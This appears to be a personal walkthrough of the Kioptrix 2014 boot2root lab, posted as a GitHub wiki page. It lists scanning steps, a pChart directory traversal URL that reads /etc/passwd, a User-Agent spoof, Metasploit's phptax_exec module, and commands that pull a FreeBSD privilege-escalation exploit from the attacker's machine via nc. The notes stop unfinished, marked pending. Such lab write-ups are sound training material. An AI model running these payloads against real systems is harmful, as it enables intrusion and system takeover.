KIOPTRIX: 2014 (#5) writeup - PacketMonkey22/boot2roots GitHub Wiki

nmap - find $ip

nmap -A -T4 -p- $ip

22, 80, and 8080

check $ip is webpage - It works!

check source - pChart2.1.3/index.php (opens)

check $ip with port 8080 - Forbidden

check $ip with port 8080 - Restricted

dirb $ip - /cgi-bin (Forbidden), index.html (it works)

nikto $ip -- CVE-2002-0082, get head post options trace methods

apache 2.2.21 , php 5.3.8 , openssl 0.9.8zc, mod ssl 2.2.21

back to pChart.

searchploit pchart - vulnerabilities

nano 31173 -- directory traversal

$IP/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd -- success

Its using apache, so try traversal to httpd.config -- success

near bottom data2 has allow from mozilla4 and virualhost 8080

curl -H "User-Agent:Mozilla/4.0" http://$ip:8080 -- mentions phptax directory

what is phptax? -- google: possible linux tax program. interestingly, when googling the name, a few results down was exploit-db.com

https://www.exploit-db.com/exploits/21665

searchsploit phptax -- 3 results. 1 rb and 2 txt. read texts, looked at rb, msf require

msfconsole

search name:phptax type:exploit -- exploit/multi/http/phptax_exec

use exploit/multi/http/phptax_exec

set rhost $ip

set rport 8080

run

whoami - www

no users and pretty much everything root

system is freeBSD9

can I compile? - yes, gcc exits

does nc exist? - yes

on kali:

found bsd exploit 28718 and downloaded it -- https://www.exploit-db.com/exploits/28718

cp 28718.c /var/www/html/

python -m SimpleHTTPServer 80

on target:

as www login folder

nc -nv $ip 80 > 28718

wouldn't compile on target. --pending--